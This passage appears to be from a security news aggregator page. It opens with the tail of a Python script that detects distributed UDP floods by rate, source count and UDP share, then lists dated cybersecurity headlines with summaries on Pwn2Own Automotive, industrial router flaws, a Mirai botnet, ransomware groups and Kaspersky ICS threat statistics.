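            s["udp_bits"] += bits
        s["sources"].add(f.src)
    return stats


def detect_udp_flood(flows, window_s=1.0, min_bps=1e9, min_sources=1000, min_udp_share=0.9):
    """Return one alert per (destination, window) that looks like a distributed UDP flood.

    All three conditions must hold: the rate is at least min_bps, the traffic
    comes from at least min_sources distinct addresses (one noisy source is a
    different problem), and UDP makes up at least min_udp_share of the bits.
    The thresholds are illustrative; the event in the article was 5.6 Tbit/s
    from more than 13,000 devices.
    """
    alerts = []
    for (dst, win), s in sorted(window_stats(flows, window_s).items()):
        bps = s["bits"] / window_s
        udp_share = s["udp_bits"] / s["bits"] if s["bits"] else 0.0
        if bps >= min_bps and len(s["sources"]) >= min_sources and udp_share >= min_udp_share:
            alerts.append({"dst": dst, "window": win, "bps": bps,
                           "sources": len(s["sources"]), "udp_share": round(udp_share, 3)})
    return alerts


def sample_flows():
    """Constructed data: in second 0, 1,500 distinct bot addresses each send 100 kB of UDP
    to 203.0.113.10 (1.2 Gbit/s aggregate) next to two small TCP flows; in second 1 the
    same bots send only 100 bytes each, which must not alert; a web server at
    203.0.113.20 sees ordinary TCP traffic throughout."""
    flows = []
    for i in range(1500):
        bot = f"10.{i // 256}.{i % 256}.1"
        flows.append(Flow(0.4, bot, "203.0.113.10", "udp", 100_000))
        flows.append(Flow(1.4, bot, "203.0.113.10", "udp", 100))
    flows.append(Flow(0.1, "192.0.2.1", "203.0.113.10", "tcp", 1_500))
    flows.append(Flow(0.9, "192.0.2.2", "203.0.113.10", "tcp", 1_500))
    for t in (0.2, 0.7, 1.3):
        flows.append(Flow(t, "192.0.2.3", "203.0.113.20", "tcp", 6_000))
    return flows


if __name__ == "__main__":
    for a in detect_udp_flood(sample_flows()):
        print(f"UDP flood on {a['dst']} window {a['window']}: "
              f"{a['bps'] / 1e9:.2f} Gbit/s from {a['sources']} sources "
              f"(udp share {a['udp_share']})")
```

    Requiring a source count as well as a rate is what separates a botnet flood from a single misconfigured host or a speed test, and the UDP-share condition keeps a legitimate TCP traffic spike from tripping the rule; in production the thresholds would be set per link capacity rather than fixed at 1 Gbit/s.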


    Hackers exploit 16 zero-days on first day of Pwn2Own Automotive 2025

    exploits industry
    2025-01-22 https://www.bleepingcomputer.com/news/security/hackers-exploit-16-zero-days-on-first-day-of-pwn2own-automotive-2025/
    On the first day of Pwn2Own Automotive 2025, security researchers exploited 16 unique zero-days and collected $382,750 in cash awards. [...]

    Autosummary: Synacktiv Team is in third place on the leaderboard and took home $57,500 after successfully demoing a bug in the OCPP protocol to hack the ChargePoint Home Flex (Model CPH50) using signal manipulation through the connector. Security researchers from PHP Hooligans also successfully hacked a fully patched Autel charger using a heap-based buffer overflow and earned $50,000, while the Viettel Cyber Security team collected $20,000 after obtaining code execution on the Kenwood In-Vehicle Infotainment (IVI) using an OS command injection zero-day.


    Pwn2Own Automotive 2025 Day 1: organizers awarded $382,750 for 16 zero-days

    exploits industry
    2025-01-22 https://securityaffairs.com/173344/hacking/pwn2own-automotive-2025-day-1.html
    Trend Micro’s Zero Day Initiative (ZDI) announced that $380K was awarded on Day 1 of Pwn2Own Automotive 2025. Trend Micro’s Zero Day Initiative (ZDI) announced that over $380,000 was awarded on Day 1 of Pwn2Own Automotive 2025, a hacking contest that was held in Tokyo. In total, the organizers awarded $382,750 for 16 unique working […] "

    Autosummary: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) received the biggest reward, $50,000 and 5 Master of Pwn points, for demonstrating a hard-coded cryptographic key bug in the Ubiquiti charger.


    Planet WGS-804HPT Industrial Switch flaws could be chained to achieve remote code execution

    industry
    2025-01-20 https://securityaffairs.com/173237/security/wgs-804hpt-flaws.html
    Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. The Planet WGS-804HPT industrial switch is used in building and home automation networks to provide connectivity for Internet of Things (IoT) devices, IP surveillance cameras, and wireless LAN network applications. This switch family is equipped with a […]

    Autosummary: Pierluigi Paganini, January 20, 2025. Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices.


    Smashing Security podcast #400: Hacker games, AI travel surveillance, and 25 years of IoT

    industry
    2025-01-16 https://grahamcluley.com/smashing-security-podcast-400/
    The video game Path of Exile 2 suffers a security breach, we explore the issues of using predictive algorithms in travel surveillance systems, and the very worst IoT devices are put on show in Las Vegas. Oh, and has Elon Musk accidentally revealed he cheats at video games? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire's Dave Bittner.

    Autosummary:


    Russian Star Blizzard Shifts Tactics to Exploit WhatsApp QR Codes for Credential Harvesting

    exploits industry rusia-ucrania financial
    2025-01-16 https://thehackernews.com/2025/01/russian-star-blizzard-shifts-tactics-to.html
    The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. "Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations

    Autosummary: Active since at least 2012, it's also tracked under the monikers Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), COLDRIVER, Dancing Salome, Gossamer Bear, Iron Frontier, TA446, and UNC4057.


    The High-Stakes Disconnect For ICS/OT Security

    industry
    2025-01-15 https://thehackernews.com/2025/01/the-high-stakes-disconnect-for-icsot.html
    Why does ICS/OT need specific controls and its own cybersecurity budget today? Because treating ICS/OT security with an IT security playbook isn’t just ineffective—it’s high risk. In the rapidly evolving domain of cybersecurity, the specific challenges and needs for Industrial Control Systems (ICS) and Operational Technology (OT) security distinctly stand out from traditional IT security. ICS/OT

    Autosummary: For example, mature organizations cite the main benefits of this control as directly contributing to safety and engineering in the following areas: safe, passive industrial traffic analysis to identify engineering assets and build an ICS/OT asset inventory; engineering troubleshooting capabilities; safe, passive industrial traffic analysis to identify engineering system vulnerabilities; industrial and engineering-driven incident response capabilities; and meeting compliance requirements. Strategic realignment opportunities: it is worth reevaluating ICS/OT risks, impacts, budgets, and controls to protect what makes an ICS organization a business – the engineering and operating technology systems. ICS/OT engineering systems, which power critical infrastructure such as electric power grids, oil and gas processing, heavy manufacturing, food and beverage processes, and water management facilities, require tailored cybersecurity strategies and controls.


    Online safety laws unsatisfactory, minister says

    industry
    2025-01-12 https://www.bbc.com/news/articles/cx2pk7589rno
    Peter Kyle responds as internet safety campaigner Ian Russell says laws to protect children need fixing.

    Autosummary: Responding to Russell's criticism, a Meta spokesperson told the BBC there was "no change to how we treat content that encourages suicide, self-injury, and eating disorders" and said the company would "continue to use our automated systems to scan for that high-severity content".


    AI-Driven Ransomware FunkSec Targets 85 Victims Using Double Extortion Tactics

    exploits ransomware industry
    2025-01-10 https://thehackernews.com/2025/01/ai-driven-ransomware-funksec-targets-85.html
    Cybersecurity researchers have shed light on a nascent artificial intelligence (AI) assisted ransomware family called FunkSec that sprang forth in late 2024, and has claimed more than 85 victims to date. "The group uses double extortion tactics, combining data theft with encryption to pressure victims into paying ransoms," Check Point Research said in a new report shared with The Hacker News.

    Autosummary: Some of the prominent actors associated with FunkSec are listed below: a suspected Algeria-based actor named Scorpion (aka DesertStorm), who has promoted the group on underground forums such as Breached Forum; El_farado, who emerged as a main figure advertising FunkSec after DesertStorm's ban from Breached Forum; XTN, a likely associate who is involved in an as-yet-unknown "data-sorting" service; Blako, who has been tagged by DesertStorm along with El_farado; and Bjorka, a known Indonesian hacktivist whose alias has been used to claim leaks attributed to FunkSec on DarkForums, either pointing to a loose affiliation or their attempts to impersonate FunkSec. The possibility that the group may also be dabbling in hacktivist activity is evidenced by the presence of DDoS attack tools, as well as those related to remote desktop management (JQRAXY_HVNC) and password generation (funkgenerate).


    GitLab CISO on proactive monitoring and metrics for DevSecOps success

    industry
    2025-01-09 https://www.helpnetsecurity.com/2025/01/09/josh-lemos-gitlab-devsecops-success/

    In this Help Net Security interview, Josh Lemos, CISO at GitLab, talks about the shift from DevOps to DevSecOps, focusing on the complexity of building systems and integrating security tools. He shares tips for maintaining development speed, fostering collaboration, and using metrics to track DevSecOps success. What are organizations’ most significant challenges when shifting from DevOps to DevSecOps? The complexity of organizations’ build processes and developer ecosystems is a significant challenge for those seeking to … More

    Autosummary: Organizations should take steps to ease the implementation of security into their systems to avoid complexity from suboptimal design decisions, such as difficult-to-maintain code and redundant dependencies, which can create a larger attack surface and generate more security scan findings for teams to sort through, prioritize, and address. While developers in DevOps may deploy code dozens or hundreds of times a day, scanners (for example, static application security testing (SAST) tools) often run on a scheduled basis, leading to delays in feedback loops.


    Politics content to be pushed on all Instagram and Threads users

    industry
    2025-01-09 https://www.bbc.com/news/articles/clyjyd0297go
    Users will no longer be able to opt out of political content from people they do not follow.

    Autosummary:


    FCC Launches "Cyber Trust Mark" for IoT Devices to Certify Security Compliance

    industry
    2025-01-08 https://thehackernews.com/2025/01/fcc-launches-cyber-trust-mark-for-iot.html
    The U.S. government on Tuesday announced the launch of the U.S. Cyber Trust Mark, a new cybersecurity safety label for Internet-of-Things (IoT) consumer devices. "IoT products can be susceptible to a range of security vulnerabilities," the U.S. Federal Communications Commission (FCC) said. "Under this program, qualifying consumer smart products that meet robust cybersecurity standards will bear

    Autosummary:


    Moxa router flaws pose serious risks to industrial environments

    industry
    2025-01-07 https://securityaffairs.com/172770/ics-scada/moxa-router-flaws-risks-to-industrial-environmets.html
    Moxa warns of two flaws in its routers and security appliances that enable privilege escalation and remote command execution. Moxa addressed privilege escalation and OS command injection vulnerabilities in cellular routers, secure routers, and network security appliances. Below are the descriptions for both vulnerabilities: Moxa released firmware updates to address vulnerabilities CVE-2024-9140 and CVE-2024-9138. Affected […]

    Autosummary:


    New Mirai botnet targets industrial routers with zero-day exploits

    exploits industry
    2025-01-07 https://www.bleepingcomputer.com/news/security/new-mirai-botnet-targets-industrial-routers-with-zero-day-exploits/
    A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices. [...]

    Autosummary: Huawei routers (via CVE-2017-17215); Neterbit routers (custom exploit); LB-Link routers (via CVE-2023-26801); Four-Faith Industrial Routers (via the zero-day now tracked as CVE-2024-12856); PTZ cameras (via CVE-2024-8956 and CVE-2024-8957).


    Vulnerable Moxa devices expose industrial networks to attacks

    industry
    2025-01-06 https://www.bleepingcomputer.com/news/security/vulnerable-moxa-devices-expose-industrial-networks-to-attacks/
    Industrial networking and communications provider Moxa is warning of a high-severity and a critical vulnerability that impact various models of its cellular routers, secure routers, and network security appliances. [...]

    Autosummary:


    Severe Security Flaws Patched in Microsoft Dynamics 365 and Power Apps Web API

    industry
    2025-01-02 https://thehackernews.com/2025/01/severe-security-flaws-patched-in.html
    Details have emerged about three now-patched security vulnerabilities in Dynamics 365 and Power Apps Web API that could result in data exposure. The flaws, discovered by Melbourne-based cybersecurity company Stratus Security, have been addressed as of May 2024. Two of the three shortcomings reside in Power Platform's OData Web API Filter, while the third vulnerability is rooted in the FetchXML

    Autosummary:


    Iranian and Russian Entities Sanctioned for Election Interference Using AI and Cyber Tactics

    industry rusia-ucrania
    2025-01-01 https://thehackernews.com/2025/01/iranian-and-russian-entities-sanctioned.html
    The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Tuesday leveled sanctions against two entities in Iran and Russia for their attempts to interfere with the November 2024 presidential election. The federal agency said the entities – a subordinate organization of Iran's Islamic Revolutionary Guard Corps and a Moscow-based affiliate of Russia's Main Intelligence

    Autosummary: In August 2024, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) jointly accused Iran of attempting to undermine democratic processes, including by orchestrating cyber operations designed to gain access to sensitive information related to the elections.


    Barbados fishing industry still reeling from hurricane aftermath

    industry
    2024-12-30 https://www.bbc.com/news/articles/cn7rk0ym68jo
    Hurricane Beryl lashed the island in July, devastating much of its fishing fleet.

    Autosummary: "Beryl was like a surprise attack, like an ambush," says Cornelius, in a deep baritone voice, over the market's chatter, reggae and thwack of cleavers on chopping boards. "I feel if we can communicate to the global superpowers the pain that we feel seeing this happen to our environment," adds 16-year-old Adrielle Baird, "then it would help them to understand and help us collaborate to find ways to fix the issues that we're seeing." At the Oistins Fish Market in Bridgetown, flying fish are still available, along with marlin, mahi-mahi and tuna, though only a handful of stalls are open.


    APT and financial attacks on industrial organizations in Q3 2024

    financial industry
    2024-12-26 https://ics-cert.kaspersky.com/publications/apt-and-financial-attackson-industrial-organizationsin-q3-2024/
    During the quarter, a number of research papers and technical advisories were published detailing attacks that either targeted or affected organizations in the industrial sector. From our perspective, the following are likely to be the most interesting for researchers and useful for cybersecurity practitioners

    Autosummary: Chinese-speaking activity. APT41 attacks: according to Mandiant researchers, the threat actor APT41 (aka Barium, Wicked Panda, Wicked Spider, Earth Baku, Axiom, Blackfly, Brass Typhoon, Bronze Atlas, HOODOO, Red Kelpie, TA415 and Winnti) launched data exfiltration attacks against global shipping and logistics, media, technology and automotive sectors, primarily in Italy, Spain, Taiwan, Thailand, Turkey and the UK. Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims from sectors including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, communications, and critical infrastructure. They believe Unit 29155 is responsible for targeting the Ukrainian government, critical infrastructure organizations, and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, as well as Central American and Asian countries. The group has been active since at least 2018 and targets organizations and individuals in Colombia, Ecuador, Chile, Panama, and other Latin American countries, focusing on various sectors, including government, finance, energy, oil and gas. SloppyLemming attacks: according to Cloudflare, the threat actor SloppyLemming (aka Outrider Tiger) has been targeting organizations in the government, law enforcement, energy, education, telecoms and technology sectors in Pakistan, Bangladesh, Sri Lanka, Nepal and China. In addition, it has the functionality to steal credentials from Outlook, browsers, crypto wallets, Telegram and Steam sessions, Discord tokens, password managers, data from Windows Credential Manager and Windows Vault, as well as read the list of active processes and installed applications.
    Southeast Asia and Korean Peninsula. Andariel attacks: the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI) and other authoring partners published a Cybersecurity Advisory on July 25 focusing on the state-sponsored cybergroup known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. CLNTEND, first detected in April 2024, is a remote access tool (RAT) that supports a wider range of network protocols for communication, including TCP, HTTP, HTTPS, TLS, and SMB (port 445). Using these tools, the group managed to carry out a number of new attacks against various Russian facilities: an instrumentation manufacturer, a polymer materials plant, a mechanical plant, a technology park, a leasing company, an oil and gas company, and an IT company. Nevertheless, some network activity from the botnet has been detected over the last four years targeting critical sectors in the USA and Taiwan, including military, government, higher education, telecoms, defense industrial base, and IT. The affiliates then moved laterally inside the network using methods such as RDP, PsExec, AnyDesk, Connectwise, N-Able, Cobalt Strike, Metasploit, and others. Data exfiltration has been observed through the use of tools such as PuTTY, Amazon AWS S3 buckets/tools, HTTP POST requests, WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.
    The CMoon worm, which spread through the compromised website of a Russian energy company, and the TIDRONE/Operation WordDrone attacks, which appear to be either supply chain attacks or exploiting a vulnerability in an ERP product to gain initial access to the victim’s systems, reiterate the point that these widely discussed attack vectors, when a third-party service is compromised by the attacker to infect other systems, should by no means be excluded from the threat models of modern industrial enterprises. Organizations in the USA, UK, Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong and Australia have been targeted. For other tasks, Head Mare primarily uses publicly available software in its attacks, such as Sliver (the main C2 framework for attackers), ngrok, rsockstun (both used for pivoting), XenAllPasswordPro, and Mimikatz. This service enables a full range of activities, including scalable bot exploitation, vulnerability and exploit management, remote management of C2 infrastructure, file uploads and downloads, remote command execution, and the ability to tailor IoT-based DDoS attacks at scale. The authoring agencies identified the threat actor as primarily targeting defense, aerospace, nuclear, and engineering organizations in the USA, Japan, South Korea, and India. The APT group is known for using spear phishing to impersonate government agencies or banking institutions to distribute various publicly available Trojans, such as AsyncRAT, BitRAT, Lime RAT, NjRAT, Quasar RAT, and Remcos RAT. Files containing saved passwords, cookies, bookmarks, browsing history, and information for autofilling forms, including credit card information, could be collected from web browsers.
    RansomHub attacks: the US Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing and Analysis Center (MS-ISAC), and Department of Health and Human Services (HHS) issued a joint Cybersecurity Advisory (CSA) on August 29 containing information relevant to the RansomHub ransomware-as-a-service (RaaS) group (formerly known as Cyclops and Knight). Middle East-related activity. Peach Sandstorm attacks: between April and July, Microsoft researchers observed the Peach Sandstorm threat actor (aka APT33, Elfin and Refined Kitten) deploy a new custom multi‑stage backdoor dubbed Tickler in attacks against the satellite, communications equipment and oil and gas sectors, as well as federal and state government sectors in the USA and UAE.


    Threat landscape for industrial automation systems. Regions, Q3 2024

    industry
    2024-12-25 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q3-2024/
    The percentage of ICS computers on which malicious objects were blocked decreased from the second quarter to 22%. But the figure increased in Africa, South Asia, South-East Asia, the Middle East, Latin America, and East Asia. Regionally, the percentage ranged from 9.7% in Northern Europe to 31.5% in Africa.

    Autosummary: Comparative analysis Latin America occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place – malicious documents Second place – malicious scripts and phishing pages, threats from email clients Threat categories Compared to global figures, the region has a higher percentage of ICS computers on which the following threat categories were blocked: Malicious documents, 2.1 times higher Malicious scripts and phishing pages, 1.4 times higher Spyware, 1.2 times higher Web miners, 1.1 times higher Threat sources The region ranked second in the world by percentage of ICS computers on which malicious threats from email clients were blocked, exceeding the global average by 1.8 times. Comparative analysis Southern Europe occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place – threats from email clients Second place – malicious documents Third place – malicious scripts and phishing pages among regions by percentage of ICS computers on which the following were blocked: Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents, 1.7 times higher Spyware, 1.4 times higher Malicious scripts and phishing pages, 1.3 times higher Ransomware, 1.3 times higher , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources Southern Europe ranked first in the world by percentage of ICS computers where malicious threats from email clients were blocked, surpassing the global average by 2 times. 
Comparative analysis In Q3 2024, Central Asia occupied leading positions among regions by percentage of ICS computers on which the following were blocked: First place: miner executable files for Windows Second place: worms Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Miners in the form of executable files for Windows, 2.3 times higher Worms, 2.2 times higher Ransomware, 1.1 times higher Spyware, 1.1 times higher , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.4 times in Q3 2024. Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Web miners, 1.4 times higher Spyware, 1.3 times higher Miners in the form of executable files for Windows, 1.1 times higher Malicious documents, 1.1 times higher Worms, 1.1 times higher , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Threat sources In Q3 2024, East Asia ranked first again among the regions by percentage of ICS computers where malicious threats from network folders were blocked, surpassing the global average by 2.7 times. 
Industries The most affected industries in the region, as selected for this report, are: Construction Building automation industries in the region, as selected for this report, are: Compared to the global averages , the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages : Manufacturing – 1.5 times higher Construction – 1.4 times Electric power – 1.3 times Building automation – 1.2 times higher Engineering and ICS integration – 1.2 times , the following industries had a significantly of ICS computers with blocked malicious objects compared to the respective global averages In Q3 2024, all selected sectors experienced an increase in the percentage of ICS computers where malicious objects were blocked. Threat categories Compared to the global figures, the region has a higher percentage of ICS computers on which the following were blocked: Web miners, 1.4 times higher Spyware, 1.3 times higher Miners in the form of executable files for Windows, 1.1 times higher Malicious documents, 1.1 times higher Worms, 1.1 times higher Threat sources Threats from email clients exceeded the global average by 1.5 times.Compared to the global figures , the region has a significantly higher percentage of ICS computers on which the following were blocked: AutoCAD malware, 6.9 times higher Viruses, 5.4 times higher Spyware, 1.4 times higher Malicious scripts and phishing pages, 1.3 times higher Worms, 1.3 times higher Malicious documents, 1.2 times higher , the region has a significantly of ICS computers on which the following were blocked: Threat sources The region ranked second in the world by percentage of ICS computers on which threats from network folders were blocked, exceeding the global average by 2.6 times. 
Specifically, the following threat categories showed significantly higher values: Ransomware, 1.8 times higher Worms, 1.7 times higher Spyware, 1.6 times higher Web miners, 1.6 times higher Viruses, 1.3 times higher Malicious scripts and phishing pages, 1.3 times higher Malicious documents, 1.3 times higher values: Threat sources The region ranked third in the world by percentage of ICS computers on which threats from internet and email clients were blocked, exceeding the global average by a factor of 1.1 and 1.7 respectively. industry in the region, as selected for this report, is Compared to the global averages, the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages : Construction – 1.7 times higher Manufacturing – 1.6 times higher Engineering & ICS Integration – 1.5 times higher Oil & Gas – 1.4 times higher Electric Power – 1.4 times higher the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages In Q3 2024, all selected sectors in the region, except oil & gas, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked. Comparative analysis Africa occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place: denylisted internet resources, malicious scripts and phishing pages, spyware, worms, threats from internet and removable devices Second place: web miners, ransomware, viruses Threat categories Compared to global figures, the region has a higher percentage of ICS computers on which threats were blocked across all threat categories. 
Ransomware, 1.8 times higher Spyware, 1.7 times higher Denylisted internet resources, 1.6 times higher Web miners, 1.4 times higher Malicious scripts and phishing pages, 1.4 times higher Malware for AutoCAD, 1.4 times higher percentage percentages of ICS computers on which the following were blocked Threat sources The region ranked first in the world both by percentage of ICS computers on which threats from internet and removable devices were blocked, exceeding the global average by 1.4 times and 4.6 times respectively. Compared to the respective global averages , the following sectors in the region saw a higher percentage of ICS computers on which malicious objects were blocked: Electric power, 1.3 times higher Construction, 1.2 times higher , the following sectors in the region saw a of ICS computers on which malicious objects were blocked: In Q3 2024, all sectors, except for manufacturing, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked. Comparative analysis South Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: Second place – threats from removable devices Third place – miners in the form of executable files for Windows, ransomware, threats from network folders Threat categories Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following were blocked: Worms, 1.4 times higher. Comparative analysis Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages – 1.2 times higher Malicious documents – 1.1 times higher , the region has a noticeably of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from email clients were blocked surpassed the global average by a factor of 1.1. 
From a global perspective , the following industries saw a higher percentage of ICS computers on which malicious objects were blocked : Construction – 1.3 times higher Electric power – 1.2 times higher Oil and gas – 1.2 times higher Building automation – 1.1 times higher Engineering & ICS Integration – 1.1 times higher , the following industries saw a of ICS computers on which malicious objects were blocked In Q3 2024, the electric power sector exhibited the most noticeable increase (by a factor of 1.1) in the percentage of ICS computers on which malicious objects were blocked, compared to the previous quarter. Comparative analysis South-East Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place: viruses, malware for AutoCAD Second place: denylisted internet resources, threats from the internet, threats from network folders Third place: malicious spyware Threat categories Viruses came second in the ranking of malware categories by percentage of ICS computers on which they were blocked. Quarterly changes and trends Threat categories Compared to the previous quarter, the largest proportional increase was in the percentage of ICS computers on which the following were blocked: Malicious documents – 1.4 times higher Malicious scripts and phishing pages – 1.1 times higher was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. 
Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked : Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.4 times Malicious documents – by 1.2 times Ransomware – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.1 times Malicious documents – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages, by 1.1 times Denylisted internet resources, by 1.1 times The top threat categories exhibit various quarterly dynamics: The heat map below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malware for AutoCAD – by 1.8 times Malicious documents – by 1.3 times Malicious scripts and phishing pages – by 1.3 times Denylisted internet resources – by 1.2 times Viruses – by 1.1 times. 
Quarterly changes and trends, threat categories: The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.3 times; Malicious scripts and phishing pages – by 1.2 times. The top threat categories exhibit various quarterly dynamics; the heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022. This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers; Building automation servers; Data storage (Historian) servers; Data gateways (OPC); Stationary workstations of engineers and operators; Mobile workstations of engineers and operators; Human machine interface (HMI); Computers used to manage technological and building automation networks; Computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries. 
Regions ranked by percentage of ICS computers on which spyware was blocked, Q3 2024: In almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in the following regions: East Asia: in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q3 2024: All regions ranked by percentage of ICS computers on which malicious objects were blocked in the third quarter can be divided into three groups. Over 25%: Africa – 31.5%; South-East Asia – 30%; Middle East – 25.6%. In the regions within this group, OT computers are generally overexposed to cyberthreats. "


    Threat landscape for industrial automation systems. Q3 2024

    industry
    2024-12-25 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q3-2024/
    The percentage of ICS computers on which malicious objects were blocked decreased by 1.5 pp from the second quarter to 22%. The biometrics sector led the surveyed industries in terms of this parameter. "

    Autosummary: This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers; Building automation servers; Data storage (Historian) servers; Data gateways (OPC); Stationary workstations of engineers and operators; Mobile workstations of engineers and operators; Human machine interface (HMI); Computers used to manage technological and building automation networks; Computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries. The most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals. The phishing lures were distributed through various channels, including phishing emails (e.g., fake vulnerability notifications claiming to be from GitHub), malicious links, and malvertising networks found on adult sites, file sharing services, betting platforms, anime resources, and web apps that monetize through traffic. Q3 in numbers (Q2 2024 vs Q3 2024, quarterly change): Global percentage of attacked ICS computers 23.5% vs 22.0% (-1.5 pp). Percentage of ICS computers on which malicious objects from different categories were blocked: Denylisted internet resources 6.63% vs 6.84% (+0.21 pp); Malicious scripts and phishing pages (JS and HTML) 5.69% vs 6.24% (+0.55 pp); Spy Trojans, backdoors and keyloggers 4.08% vs 3.91% (-0.17 pp); Malicious documents (MS Office + PDF) 1.96% vs 1.97% (+0.01 pp). Percentage of ICS computers on which malicious objects were blocked, by month, 2022–2024: Regionally*, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 9.7% in Northern Europe to 31.5% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022–2024: Compared to the third quarter of 2023, the percentage decreased by 1.7 pp. 
Percentage of ICS computers on which malicious objects were blocked in selected industries. Diversity of detected malicious objects: Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose. "


    2025 is going to be a bumpy year for IoT

    industry
    2024-12-24 https://www.helpnetsecurity.com/2024/12/24/iot-2025-security/

    In the Internet of Things (IoT) sector, 2025 is shaping up to be a politically charged year. Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. My advice for companies involved in manufacturing or using IoT devices? Prepare for the worst, but hope for the best. Geopolitical tensions are impacting IoT There’s no denying that the macro landscape is splintered. Internet infrastructure is … More

    The post 2025 is going to be a bumpy year for IoT appeared first on Help Net Security.

    "

    Autosummary: Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. Governments are kicking into action At the same time, and likely in response to the above, governments are introducing big legislative changes to encourage better device practices. "


    Brazil shuts BYD factory site over "slavery" conditions

    latam industry
    2024-12-24 https://www.bbc.com/news/articles/c8xj9jp57r2o
    More than 160 workers have been rescued, according to local prosecutors. "

    Autosummary: It added that it had conducted a "detailed review" of the working and living conditions for subcontracted employees, and asked on "several occasions" for the construction firm to make improvements. "


    Three shot dead as medics, journalists and police attacked at Haiti hospital

    industry
    2024-12-24 https://www.bbc.com/news/articles/cx2vpdnd2jmo
    Many others are injured when armed men fire at medical staff, police and reporters in Port-au-Prince. "

    Autosummary: "


    FTC orders Marriott and Starwood to implement strict data security

    industry
    2024-12-23 https://www.bleepingcomputer.com/news/security/ftc-orders-marriott-and-starwood-to-implement-strict-data-security/
    The Federal Trade Commission (FTC) has ordered Marriott International and Starwood Hotels to define and implement a robust customer data security scheme following failures that led to massive data breaches. [...] "

    Autosummary: "


    Why cybersecurity is critical to energy modernization

